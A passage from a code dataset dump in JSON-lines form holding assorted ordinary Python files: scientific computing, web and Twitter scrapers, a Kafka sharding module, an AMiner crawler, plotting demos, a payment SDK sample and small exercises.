v=v*(1.-(((x[1]-bb[1][0])*(bb[1][1]-x[1])/(0.5*LY)**2)**N*kronecker(DIM)[1]))\n mask+=(whereZero(x[1]-bb[1][0])+whereZero(x[1]-bb[1][1]))*kronecker(DIM)[1]\nsc.initialize(eta=ETA, fixed_u_mask= mask)\np=Scalar(0.,ReducedSolution(dom))\nv,p=sc.solve(v,p, verbose=True)\nsaveVTK(\"u.vtu\",velocity=v,pressure=p,m=mask)\n\n","sub_path":"finley/test/python/subduction1.py","file_name":"subduction1.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"401183758","text":"import requests, boto3, os\nfrom datetime import datetime\n\n# bucket = spd-police-reports\nAWS_CONFIG = {\n 'S3_BUCKET': os.environ['AWS_CONFIG_S3_BUCKET'],\n 'ACCESS_KEY': os.environ['AWS_CONFIG_ACCESS_KEY'],\n 'SECRET_KEY': os.environ['AWS_CONFIG_SECRET_KEY']\n}\n\nsession = boto3.Session(\n aws_access_key_id=AWS_CONFIG['ACCESS_KEY'],\n aws_secret_access_key=AWS_CONFIG['SECRET_KEY'],\n)\ns3 = session.resource('s3')\n\ndef scrape_reports(event, context):\n print('scraping reports...')\n all_categories = {'Animal', 'Arrest', 'Assault', 'Bike', 'Burglary', 'CarProwl', 'Collision', 'Crisis', 'DUI', 'Disorderly', 'Disturbance', 'DriveBy', 'Dumping', 'FalseAlarm', 'Fraud', 'Harbor', 'Homicide', 'Injury', 'Liquor', 'Lost', 'Metro', 'Narcotics', 'OtherProp', 'OtherVice', 'PropDamage', 'Prostitution', 'Purse_Snatch', 'Robbery', 'SOAP', 'SODA', 'Shoplifting', 'Threats', 'Traffic', 'Trespass', 'Unsafe', 'VehicleTheft', 'Weapon'}\n where_params = ' OR '.join([f\"(mapcategory = '{cat}')\" for cat in all_categories])\n query_url = 'https://gisrevprxy.seattle.gov/arcgis/rest/services/SPD_EXT/SPDReports/MapServer/0/query'\n params = {\n 'f': 'json',\n 'where': where_params,\n 'returnGeometry': 'true',\n 'spatialRel': 'esriSpatialRelIntersects',\n 'geometry': '{\"xmin\":-13775786.985667564,\"ymin\":5948635.289265888,\"xmax\":-13462700.917811498,\"ymax\":6261721.357121956,\"spatialReference\":{\"wkid\":102100}}',\n 'geometryType': 'esriGeometryEnvelope',\n 'inSR': '102100',\n 'outFields': '*',\n 'outSR': '102100'\n }\n res = requests.get(query_url, params=params)\n\n date = datetime.utcnow().strftime('%Y%m%d_%H%M%S')\n key = f'police_reports_{date}.json'\n s3.Bucket(AWS_CONFIG['S3_BUCKET']).put_object(Key=key, Body=res.text)\n print(f'successfully uploaded to {key}')\n","sub_path":"scheduled/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"36612701","text":"import matplotlib.pyplot as plt \nimport numpy as np \n\nx = np.linspace(-3,3,50)\ny1 = 2*x + 1\ny2 = x**2\n\nplt.figure()\n\n# 设置坐标轴的名字和范围\nplt.xlim((-1,2))\nplt.ylim((-2,3))\nplt.xlabel(('I am x'))\nplt.ylabel(('I am y'))\n\n# 改变坐标轴上ticks的显示\n# 使用plt.xticks设置x轴刻度:范围是(-1,2);个数是5.\n# 使用plt.yticks设置y轴刻度以及名称:\n# 刻度为[-2, -1.8, -1, 1.22, 3];\n# 对应刻度的名称为[‘really bad’,’bad’,’normal’,’good’, ‘really good’].\nnew_ticks = np.linspace(-1,2,5)\nprint(new_ticks)\nplt.xticks(new_ticks)\nplt.yticks([-2,-1.8,-1,1.22,3],[r'$really\\ bad$', r'$bad$', r'$normal$', r'$good$', r'$really\\ good$'])\n\nl1, = plt.plot(x, y2, label='up')\nl2, = plt.plot(x, y1, color='red', linewidth=1.0, linestyle='--', label='down')\nplt.legend(handles=[l1,l2], labels=['aaa','bbb'], loc='best')\n\nplt.show()","sub_path":"matplotlib/05_matplotlib_legend.py","file_name":"05_matplotlib_legend.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"476645470","text":"from common.const import DestType, SrcType\nfrom kafka.client import KafkaClient\nfrom django.conf import settings\nimport struct\n\nimport logging\n\nlog = logging.getLogger(__name__)\n\n\n# route and sharding\ndef encode_partition_id(partition_id):\n return struct.pack('>H', partition_id)\n\n\ndef decode_partition_id(packed_partition_id):\n return struct.unpack('>H', packed_partition_id)[0]\n\n\ndef is_conv_event(msg_type):\n from apps.message.models import Message\n return msg_type in (\n Message.TYPE_TEXT_CHAT_CREATED,\n Message.TYPE_MULTIMEDIA_CHAT_CREATED,\n Message.TYPE_APP_CONTENT_UPDATED,\n )\n\n\ndef hash_spec():\n return {'type': 'hash'}\n\n\ndef list_spec(addrs):\n spec = {'type': 'list'}\n if len(addrs) == 0 or isinstance(addrs[0], int):\n spec['arguments'] = {\n 'type': 'id_list',\n 'addrs': addrs\n }\n return spec\n else:\n spec['arguments'] = {\n 'type': 'peer_list' if len(addrs[0]) == 4 else 'conv_list',\n 'addrs': addrs\n }\n return spec\n\n\ndef dest_type2peer_type(dest_type):\n from common.const import PeerType\n return {\n DestType.ORG_MEMBER: PeerType.ORG_MEMBER,\n DestType.DEPARTMENT: PeerType.DEPARTMENT,\n DestType.DISCUSSION_GROUP: PeerType.DISCUSSION_GROUP,\n }.get(dest_type)\n\n\n# @TODO fix here\ndef src_type2peer_type(src_type):\n from common.const import PeerType\n if src_type == SrcType.ORG_MEMBER:\n return PeerType.ORG_MEMBER\n else:\n return src_type\n\n\ndef collapse(msg):\n from apps.account.models import User\n dest_type = msg['dest_type']\n if dest_type != DestType.USER_ORG:\n return [msg]\n dest_id = msg['dest_id']\n user = User.objects.getx(id=dest_id)\n if user is None:\n log.error(\"user_org message send failed, reason:%s not found\", dest_id)\n return []\n msgs = []\n for org in user.orgs():\n org_id = org.org_id\n m = msg.copy()\n m['scope_org_id'] = org_id\n m['dest_type'] = DestType.ORG\n m['dest_id'] = org_id\n msgs.append(m)\n return msgs\n\n\ndef generate_route_spec(data):\n from apps.message.models import Message\n msg_type = data['type']\n dest_type = data['dest_type']\n if not is_conv_event(msg_type):\n user_ids = []\n if dest_type == DestType.ORG_MEMBER:\n user_ids.append(int(data['dest_id']))\n if 'src_type' in data and 'src_id' in data \\\n and data['src_type'] == SrcType.ORG_MEMBER \\\n and data['type'] != Message.TYPE_MESSAGE_READ:\n user_ids.append(int(data['src_id']))\n user_ids = list(set(user_ids))\n return list_spec(user_ids)\n elif dest_type in (DestType.DISCUSSION_GROUP, DestType.DEPARTMENT, DestType.ORG):\n return hash_spec()\n else:\n if dest_type == DestType.ORG_MEMBER:\n peer_list = [data['src_id'], data['dest_id']]\n return list_spec(list(set(peer_list)))\n else:\n return hash_spec()\n\n\ndef get_partition_cnt(queue):\n kc = KafkaClient(settings.KAFKA_URL)\n return len(kc.get_partition_ids_for_topic(queue))\n\n\ndef calc_landbridge_server_url(user_id):\n landbridge_spec = settings.LANDBRIDGE_SPEC\n mod = landbridge_spec['cluster_size']\n index = user_id % mod\n return landbridge_spec['shard'][index]['url']\n\n\ndef calc_partition_id(user_id):\n landbridge_spec = settings.LANDBRIDGE_SPEC\n mod = landbridge_spec['cluster_size']\n index = user_id % mod\n return landbridge_spec['shard'][index]['queue_partition']\n\n\ndef partition_id2queue_partition_id(index):\n landbridge_spec = settings.LANDBRIDGE_SPEC\n return landbridge_spec['shard'][index]['queue_partition']\n\n\ndef do_partition(addrs):\n partitions = {}\n for addr in addrs:\n if isinstance(addr, int):\n partition_id = calc_partition_id(addr)\n elif isinstance(addr, list):\n partition_id = calc_partition_id(addr[0])\n else:\n raise ValueError('partition id list error')\n append_to_dict(partitions, partition_id, addr)\n return partitions\n\n\ndef do_sharding(msg, partition_num):\n import copy\n route_spec = msg['shard']\n if route_spec is None:\n return [msg]\n\n sharded_msg = {}\n route_type = route_spec['type']\n if route_type is None:\n return [msg]\n elif route_type == 'list':\n args = route_spec['arguments']\n list_type = args['type']\n list_addrs = args['addrs']\n if list_type in ('id_list', 'peer_list', 'conv_list'):\n shards = do_partition(list_addrs)\n for (k, v) in shards.items():\n m = msg.copy()\n m['shard']['arguments']['addrs'] = v\n sharded_msg[k] = [m]\n return sharded_msg\n else:\n raise ValueError('unknown list route')\n\n elif route_type == 'hash':\n landbridge_spec = settings.LANDBRIDGE_SPEC\n mod = landbridge_spec['cluster_size']\n for i in range(mod):\n m = copy.deepcopy(msg)\n m['shard']['arguments'] = {'mod': mod, 'index': i}\n queue_partition = partition_id2queue_partition_id(i)\n append_to_dict(sharded_msg, queue_partition, m)\n return sharded_msg\n else:\n raise ValueError(\"not support shard type now\")\n\n\ndef append_to_dict(dictionary, k, v):\n acc = dictionary.get(k)\n if acc is None:\n dictionary[k] = [v]\n else:\n acc.append(v)\n","sub_path":"starfish-ws/common/shard.py","file_name":"shard.py","file_ext":"py","file_size_in_byte":5515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"498119033","text":"# A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\n# a**2 + b**2 = c**2\n# For example, 3**2 + 4**2 = 9 + 16 = 25 = 5**2\n# Given N, Check if there exists any Pythagorean triplet for which a + b + c = N.\n# Find maximum possible value of abc among all such Pythagorean triplets.\n# If there is no such Pythagorean triplet print -1.\n\nimport sys\nfrom math import sqrt\n\ndef calc_pyth(N):\n max_product = -1\n # use quadratic formula\n for c in range(N):\n if (c**2 + 2*c*N - N**2) >= 0:\n b_plus = (N - c + sqrt(c**2 + 2*c*N - N**2)) / 2\n b_minus = (N - c - sqrt(c**2 + 2*c*N - N**2)) / 2\n if (b_plus % 1 == 0) and (b_plus > 0):\n temp_plus = c * b_plus * (N - c - b_plus)\n if (temp_plus > max_product) and (temp_plus > 0):\n max_product = temp_plus\n if (b_minus % 1 == 0) and (b_minus > 0):\n temp_minus = c * b_minus * (N - c - b_minus)\n if (temp_minus > max_product) and (temp_minus > 0):\n max_product = temp_minus\n return int(max_product)\n \n\nt = int(raw_input().strip())\nfor a0 in xrange(t):\n n = int(raw_input().strip())\n print(calc_pyth(n))\n","sub_path":"Problem_009.py","file_name":"Problem_009.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"273469083","text":"from bs4 import BeautifulSoup\nimport requests\nimport json\nimport sys\n\nname=str(sys.argv[1])\n\nurl = 'https://it.wikipedia.org/wiki/{}'.format(name)\nprint (url)\nresponse = requests.get(url, timeout=5)\ncontent = BeautifulSoup(response.content, \"html.parser\")\n\nauthor = content.find('h1', attrs={\"class\": \"firstHeading\"}).text\n\ncitArr = []\n\nfor cit in content.findAll('table', attrs={\"class\": \"citazione-table\"}):\n\tcitObject = {\n\t\t\"Author\" : author,\n\t\t\"text\" : cit.find('p').text\n\t}\n\tcitArr.append(citObject)\n\nwith open('citData.json','w', encoding='utf-8') as outfile:\n\tjson.dump(citArr, outfile, ensure_ascii=False, indent=2)","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"203295113","text":"from CyberSource import *\nfrom pathlib import Path\nimport os\nimport json\nfrom importlib.machinery import SourceFileLoader\n\nconfig_file = os.path.join(os.getcwd(), \"data\", \"Configuration.py\")\nconfiguration = SourceFileLoader(\"module.name\", config_file).load_module()\n\n# To delete None values in Input Request Json body\ndef del_none(d):\n for key, value in list(d.items()):\n if value is None:\n del d[key]\n elif isinstance(value, dict):\n del_none(value)\n return d\n\ndef add_duplicate_information(type):\n orderInformationAddressAddress1 = \"1234 Sample St.\"\n orderInformationAddressAddress2 = \"Mountain View\"\n orderInformationAddressLocality = \"California\"\n orderInformationAddressCountry = \"US\"\n orderInformationAddressAdministrativeArea = \"CA\"\n orderInformationAddressPostalCode = \"94043\"\n orderInformationAddress = Riskv1liststypeentriesOrderInformationAddress(\n address1 = orderInformationAddressAddress1,\n address2 = orderInformationAddressAddress2,\n locality = orderInformationAddressLocality,\n country = orderInformationAddressCountry,\n administrative_area = orderInformationAddressAdministrativeArea,\n postal_code = orderInformationAddressPostalCode\n )\n\n orderInformationBillToFirstName = \"John\"\n orderInformationBillToLastName = \"Doe\"\n orderInformationBillToEmail = \"nobody@example.com\"\n orderInformationBillTo = Riskv1liststypeentriesOrderInformationBillTo(\n first_name = orderInformationBillToFirstName,\n last_name = orderInformationBillToLastName,\n email = orderInformationBillToEmail\n )\n\n orderInformation = Riskv1liststypeentriesOrderInformation(\n address = orderInformationAddress.__dict__,\n bill_to = orderInformationBillTo.__dict__\n )\n\n paymentInformation = Riskv1liststypeentriesPaymentInformation(\n )\n\n clientReferenceInformationCode = \"54323007\"\n clientReferenceInformation = Riskv1decisionsClientReferenceInformation(\n code = clientReferenceInformationCode\n )\n\n riskInformationMarkingDetailsAction = \"add\"\n riskInformationMarkingDetails = Riskv1liststypeentriesRiskInformationMarkingDetails(\n action = riskInformationMarkingDetailsAction\n )\n\n riskInformation = Riskv1liststypeentriesRiskInformation(\n marking_details = riskInformationMarkingDetails.__dict__\n )\n\n requestObj = AddNegativeListRequest(\n order_information = orderInformation.__dict__,\n payment_information = paymentInformation.__dict__,\n client_reference_information = clientReferenceInformation.__dict__,\n risk_information = riskInformation.__dict__\n )\n\n\n requestObj = del_none(requestObj.__dict__)\n requestObj = json.dumps(requestObj)\n\n\n try:\n config_obj = configuration.Configuration()\n client_config = config_obj.get_configuration()\n api_instance = DecisionManagerApi(client_config)\n return_data, status, body = api_instance.add_negative(type, requestObj)\n\n print(\"\\nAPI RESPONSE CODE : \", status)\n print(\"\\nAPI RESPONSE BODY : \", body)\n\n write_log_audit(status)\n return return_data\n except Exception as e:\n write_log_audit(e.status if hasattr(e, 'status') else 999)\n print(\"\\nException when calling DecisionManagerApi->add_negative: %s\\n\" % e)\n\ndef write_log_audit(status):\n print(f\"[Sample Code Testing] [{Path(__file__).stem}] {status}\")\n\nif __name__ == \"__main__\":\n type = \"positive\"\n\n add_duplicate_information(type)\n","sub_path":"samples/RiskManagement/DecisionManager/add-duplicate-information.py","file_name":"add-duplicate-information.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"10174547","text":"A=[1,1,2,3,5,8,13,21,34,55,88]\nB=[1,3,5,4,7,88,66,59,40,54]\nC = set(A) & set(B)\nprint(\"Các phần tử trùng nhau trong list A,B là\",C)\nfor i in A:\n for j in B:\n if(j==i):\n A.remove(j)\n B.remove(j)\nprint(\"Xóa các phần tử trong list A bị trùng nhau\",A)\nprint(\"Xóa các phần tử trong list B bị trùng nhau\",B)","sub_path":"Bai2.py","file_name":"Bai2.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"599182283","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('questions', '0005_auto_20150211_2041'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MatchAnswer',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('importance_level', models.CharField(default=b'Somewhat Important', max_length=120, null=True, blank=True)),\n ('points', models.IntegerField(default=b'20')),\n ('timestamp', models.DateTimeField(auto_now_add=True)),\n ('update', models.DateTimeField(auto_now=True)),\n ('answer', models.ForeignKey(blank=True, to='questions.Answer', null=True)),\n ('question', models.ForeignKey(to='questions.Question')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='useranswer',\n name='points',\n field=models.IntegerField(default=b'20'),\n preserve_default=True,\n ),\n ]\n","sub_path":"matchmaker/src/questions/migrations/0006_auto_20150211_2052.py","file_name":"0006_auto_20150211_2052.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290055719","text":"import json\nimport sys\nimport os\nimport numpy as np\nimport spacy\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom textblob import TextBlob\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport sklearn\n# Will predict popularity based on features extracted from ~100 tweets per day for 7 days for a set of topics\n# Features - Tweet length (chars, average sentence length, word count), time created (military standard),\n# day created (mon-sun), Number of hashtags used, Number of user mentions, number of links,\n# has media (pics, videos, etc.) NLP features, sentiment (Use VADER), ACCESS many through entities\n# response variable - retweets_count, favorite_count (likes),\n\n\ndef load_list (filepath):\n \"\"\"\n Given a filepath of a textfile containing contiguous Twitter Tweet object (JSON format), unpack them into a list and\n return\n @:param filepath - string pointing to the textfile to be analyzed\n @:return list of JSON-formatted strings representing Tweet Objects\n \"\"\"\n tweets = None\n with open(filepath, 'r') as file:\n tweets = []\n current_tweet = \"\"\n bracket_balance = 0\n while 1:\n current_char = file.read(1)\n if not current_char:\n break\n\n current_tweet = current_tweet + current_char\n\n if current_char == '{':\n bracket_balance += 1\n elif current_char == '}' and current_tweet[len(current_tweet) - 13:] != \"Intelligence}\" and \\\n current_tweet[len(current_tweet) - 10:] != \"ufe0f(~);}\":\n bracket_balance -= 1\n if bracket_balance == 0:\n print(current_tweet)\n current_dict = json.loads(current_tweet)\n tweets.append(current_dict)\n current_tweet = \"\"\n return tweets\n\n\ndef build_features(tweets):\n \"\"\"\n From a list of JSON-formatted strings representing Tweet objects, return a numpy array with tweets as rows and select\n features as columns\n @:param tweets - list of JSON-formatted strings representing Tweet objects\n @:return numpy numeric array with len(tweets) rows and columns corresponding to relevant features. Returns None if no\n valid tweets found\n \"\"\"\n features = np.zeros((len(tweets), 12))\n nlp = spacy.load(\"en_core_web_sm\")\n vds = SentimentIntensityAnalyzer()\n row = 0\n ids = []\n for i in range(len(tweets)):\n\n # Configure tweet to original/retweeted object if tweet is not retweeted or retweeted\n if 'retweeted_status' in tweets[i].keys():\n tweet = tweets[i]['retweeted_status']\n else:\n tweet = tweets[i]\n\n if tweet['id'] in ids:\n continue\n else:\n ids.append(tweet['id'])\n\n # Get full text\n full_text = tweet['text']\n\n # loads text into spacy model\n doc = nlp(full_text)\n\n # Col 0 - Total char length, Col 1 - Average sentence length, Col 2 - word count\n features[row, 0] = len(full_text)\n sentences = list(doc.sents)\n features[row, 1] = sum([len(i) for i in sentences])\n words = [token.text for token in doc if not token.is_punct]\n features[row, 2] = len(words)\n\n # Col 3 - Number Hashtags used, Col 4 - Number User Mentions, Col 5 - Number URL's\n features[row, 3] = len(tweet['entities']['hashtags'])\n features[row, 4] = len(tweet['entities']['user_mentions'])\n features[row, 5] = len(tweet['entities']['urls'])\n\n # Date dictionary conversion\n dates = {'mon': 1, 'tue': 2, 'wed': 3, 'thu': 4, 'fri': 5, 'sat': 6, 'sun': 7}\n # Isolate time and verify proper notation\n time = tweet['created_at'][11:16]\n if time[2] != ':':\n print(\"Time Notational Error\")\n sys.exit()\n time = int(time[0:2]) * 60 + int(time[4:])\n\n # Col 6 - Day, Col 7 - Time\n features[row, 6] = dates[tweet['created_at'][0:3].lower()]\n features[row, 7] = time\n\n # Col 8 - Sentiment. In some cases, either VADER or TextBlob result in scores of 0 - I consider this an error\n vdsAnalysis = vds.polarity_scores(full_text)['compound']\n blobAnalysis = TextBlob(full_text).sentiment.polarity\n if vdsAnalysis == 0:\n features[row, 8] = blobAnalysis\n else:\n features[row, 8] = vdsAnalysis\n\n # Col 9 - Likes (favorites) of the Tweet, Col 10 - Retweets\n features[row, 9] = tweets[i]['user']['followers_count']\n features[row, 10] = tweet['favorite_count']\n features[row, 11] = tweet['retweet_count']\n row += 1\n if not features.any():\n return None\n return features[~np.all(features == 0, axis=1)]\n\n\ndef build_dataset(source):\n \"\"\"\n Given a directory, load every text file and utilize load_list as well as build_features to assemble a database\n @:param source - directory to load Tweet record files from\n @:return numpy array of all selected Tweet instances and associated features\n \"\"\"\n dataset = None\n # Iterate through all files in the directory\n for file in os.listdir(source):\n # Load the tweets in file and build features\n tweet_list = load_list(source + \"/\" + file)\n current_features = build_features(tweet_list)\n # Continue if no features found and add to dataset otherwise\n if current_features is None:\n continue\n if dataset is None:\n dataset = current_features\n else:\n dataset = np.vstack((dataset, current_features))\n return dataset\n\n\nif __name__ == '__main__':\n dataset = build_dataset(\"data/Crises\")\n corr = np.corrcoef(dataset)\n print(dataset.shape)\n\n\n\n","sub_path":"crisis_predictor.py","file_name":"crisis_predictor.py","file_ext":"py","file_size_in_byte":5764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"129798558","text":"scores = []\r\nsum = 0\r\nfor i in range(5):\r\n score = int(input(\"점수를 입력하세요 : \"))\r\n scores.append(score)\r\n sum += score\r\navg = sum/5\r\nprint(\"평균 = \",avg)\r\ncnt = 0\r\nfor i in scores:\r\n if i > avg:\r\n cnt+=1\r\nprint(\"평균 이상의 학생 수 = \",cnt)\r\n\r\n\r\n","sub_path":"연습문제 6-5.py","file_name":"연습문제 6-5.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"400285324","text":"\"\"\"\nhttps://www.aminer.cn/ requires login to view additional info.\n\nTrying to login on aminer.cn seems to be a bit buggy.\n\nThey seem to have some (private?) APIs:\n* apiv2.aminer.cn/magic\n* api.aminer.cn/api\n\nThe network tab in web browsers displays a lot of interesting XHR.\n\"\"\"\nimport urllib.parse\nimport logging\nfrom dataclasses import dataclass\nfrom typing import Generator, List, Tuple, Optional\n\nfrom ...storage import Author, Publication\nfrom ..step import Step\nfrom ..crawler import Crawler\n\n_log = logging.getLogger(__name__)\n\n\nclass ArnetMiner:\n def __init__(self, session, base_url=\"https://apiv2.aminer.cn/magic\"):\n self._session = session\n self._headers = {\"Accept\": \"application/json\"}\n self._base_url = base_url\n\n async def search_person(self, query):\n return await self.query(\n {\n \"action\": \"person7.SearchPersonWithDSL\",\n \"parameters\": {\n \"offset\": 0,\n \"size\": 20,\n \"query\": query,\n \"aggregation\": [\"gender\", \"h_index\", \"nation\", \"lang\"],\n },\n \"schema\": {\n \"person\": [\n \"id\",\n \"name\",\n \"name_zh\",\n \"avatar\",\n \"tags\",\n \"is_follow\",\n \"num_view\",\n \"num_follow\",\n \"is_upvoted\",\n \"num_upvoted\",\n \"is_downvoted\",\n \"bind\",\n {\n \"profile\": [\n \"position\",\n \"position_zh\",\n \"affiliation\",\n \"affiliation_zh\",\n \"org\",\n ]\n },\n {\n \"indices\": [\n \"hindex\",\n \"gindex\",\n \"pubs\",\n \"citations\",\n \"newStar\",\n \"risingStar\",\n \"activity\",\n \"diversity\",\n \"sociability\",\n ]\n },\n ]\n },\n }\n )\n\n async def get_stats(self, author_id):\n return await self.query(\n {\"action\": \"person.GetPersonPubsStats\", \"parameters\": {\"ids\": [author_id]}}\n )\n\n async def search_publications(self, author_id, offset):\n return await self.query(\n {\n \"action\": \"person.GetPersonPubs\",\n \"parameters\": {\n \"offset\": offset,\n \"size\": 100,\n \"sorts\": [\"!year\"],\n \"ids\": [author_id],\n \"searchType\": \"all\",\n },\n \"schema\": {\n \"publication\": [\n \"id\",\n \"year\",\n \"title\",\n \"title_zh\",\n \"authors._id\",\n \"authors.name\",\n \"authors.name_zh\",\n \"num_citation\",\n \"venue.info.name\",\n \"venue.volume\",\n \"venue.info.name_zh\",\n \"venue.issue\",\n \"pages.start\",\n \"pages.end\",\n \"lang\",\n \"pdf\",\n \"doi\",\n \"urls\",\n \"versions\",\n ]\n },\n }\n )\n\n async def search_cited_by(self, paper_id, offset):\n return await self.query(\n {\n \"action\": \"publication.CitedByPid\",\n \"parameters\": {\"offset\": offset, \"size\": 100, \"ids\": [paper_id]},\n }\n )\n\n async def query(self, data):\n url = self._base_url\n # Probably uses and returns a list so many can be invoked at once\n async with self._session.post(url, json=[data], headers=self._headers) as resp:\n if resp.status == 200:\n return (await resp.json())[\"data\"][0]\n else:\n raise ValueError(\n f\"HTTP {resp.status} fetching {url}:\\n{await resp.text()}\"\n )\n\n\ndef author_id_from_url(url):\n url = urllib.parse.urlparse(url)\n assert url.netloc == \"www.aminer.cn\", f\"unexpected domain {url.netloc}\"\n parts = url.path.split(\"/\")\n assert parts[1] == \"profile\", f\"unexpected path {parts[1]}\"\n return parts[3]\n\n\ndef adapt_publications(data) -> Generator[Publication, None, None]:\n def maybe_int(value):\n # Sometimes we get \"ArticleNo.22\" in the page which is not a page number\n return int(value) if value and value.isdigit() else None\n\n # If it has 0 keyValues then the items key will be missing\n for pub in data.get(\"items\", ()):\n pub_id = pub[\"id\"]\n yield Publication(\n id=pub_id,\n name=pub[\"title\"],\n authors=[\n Author(\n id=author.get(\"id\"),\n full_name=author[\"name\"],\n extra={\"organization\": author.get(\"org\"),},\n )\n for author in pub[\"authors\"]\n ],\n year=pub[\"year\"] or None, # may be 0, we prefer None\n ref=f\"https://www.aminer.cn/pub/{pub_id}\",\n extra={\n \"cit-count\": pub[\"num_citation\"], # used later\n \"doi\": pub.get(\"doi\"),\n \"language\": pub.get(\"lang\") or None,\n \"first-page\": maybe_int(pub.get(\"pages\", {}).get(\"start\")),\n \"last-page\": maybe_int(pub.get(\"pages\", {}).get(\"end\")),\n \"urls\": pub.get(\"urls\"),\n \"issue\": pub.get(\"venue\", {}).get(\"issue\") or None,\n \"volume\": pub.get(\"venue\", {}).get(\"volume\") or None,\n \"publisher\": pub.get(\"venue\", {}).get(\"info\", {}).get(\"name\"),\n \"pdf\": pub.get(\"pdf\") or None,\n },\n )\n\n\nclass Stage:\n @dataclass\n class FetchPublications:\n INDEX = 0\n known_pub_ids: Optional[List[str]] = None\n offset: int = 0\n\n @dataclass\n class FetchCitations:\n INDEX = 1\n missing_pub_ids: List[str]\n cit_offset: int = 0\n\n\nclass CrawlArnetMiner(Crawler):\n Stage = Stage\n\n @classmethod\n def namespace(cls):\n return \"aminer\"\n\n @classmethod\n def fields(cls):\n return {\n \"url\": 'Navigate to <a href=\"https://www.aminer.cn/\">AMiner\\'s home</a> and search for '\n \"your profile. Click on it when you find it and copy the URL.\"\n }\n\n @classmethod\n def validate_field(self, key, value):\n assert key == \"url\", f\"invalid key {key}\"\n author_id_from_url(value) # will raise (fail validation) on bad value\n\n @classmethod\n async def _step(cls, values, stage, session) -> Step:\n user_author_id = author_id_from_url(values[\"url\"])\n miner = ArnetMiner(session)\n\n if isinstance(stage, Stage.FetchPublications):\n data = await miner.search_publications(user_author_id, stage.offset)\n\n pub_count = data[\"keyValues\"][\"total\"]\n self_publications = list(adapt_publications(data))\n known_pub_ids = (stage.known_pub_ids or []) + [\n # Don't bother saving those without citations to save on requests\n p.id\n for p in self_publications\n if p.extra[\"cit-count\"] != 0\n ]\n\n offset = stage.offset + len(self_publications)\n if offset >= pub_count or not self_publications:\n delay = 30 * 60\n stage = Stage.FetchCitations(missing_pub_ids=known_pub_ids)\n else:\n delay = 5 * 60\n stage = Stage.FetchPublications(\n known_pub_ids=known_pub_ids, offset=offset\n )\n\n return Step(delay=delay, stage=stage, self_publications=self_publications,)\n\n elif isinstance(stage, Stage.FetchCitations):\n if not stage.missing_pub_ids:\n _log.debug(\"checked all publications\")\n return Step()\n\n pub_id = stage.missing_pub_ids[0]\n data = await miner.search_cited_by(pub_id, stage.cit_offset)\n\n # The listed citations are less than the found count for some reason; however it's\n # unlikely that they are greater (so if we previously fetched 0 we don't bother\n # making additional network requests).\n cit_count = data[\"keyValues\"][\"total\"]\n\n citations = list(adapt_publications(data))\n cit_offset = stage.cit_offset + len(citations)\n\n if cit_offset >= cit_count or not citations:\n delay = 30 * 60\n stage = Stage.FetchCitations(missing_pub_ids=stage.missing_pub_ids[1:])\n else:\n delay = 5 * 60\n stage = Stage.FetchCitations(\n missing_pub_ids=stage.missing_pub_ids, cit_offset=cit_offset\n )\n\n return Step(delay=delay, stage=stage, citations={pub_id: citations},)\n","sub_path":"server/crawler/crawlers/aminer.py","file_name":"aminer.py","file_ext":"py","file_size_in_byte":9603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"635775210","text":"## Another script to convert old annotation into json\n# Also handy because it acts as the format for coco json: \nimport sys, json\nimport bird0 as oldBird\nimport numpy as np\n\n#from maskrcnn_benchmark.data.datasets import bird0 as oldBird\n\nann_file = sys.argv[1]\nspec_dir = sys.argv[2]\n\nold_database = oldBird.BirdDataset(ann_file,spec_dir)\nn_images = old_database.n_images\n\nn_categories = 2\n\ndata = {\n \"info\":{},\n \"licenses\":[{}] * n_images,\n \"images\":[{}] * n_images,\n \"annotations\":[], #list of dicts\n \"categories\":[{}] * n_categories # list of dicts\n}\n\ndata[\"info\"] = {\n \"description\": \"Cowbird Song Annotations\",\n \"url\": None,\n \"version\":\"1.0\",\n \"year\":2019,\n \"contributor\":\"aperkes\",\n \"date_created\":\"2019/01/01\"\n}\n\ndata[\"categories\"] = [\n {\"supercategory\":\"background\",\"id\":1,\"name\":\"noise\"},\n {\"supercategory\":\"cowbird\",\"id\":2,\"name\":\"vocalization\"}\n]\n\nann_count = 0\nfor i in range(n_images):\n image, _, idx = old_database[i]\n labels = old_database.label_list[i]\n boxes = old_database.box_list[i]\n 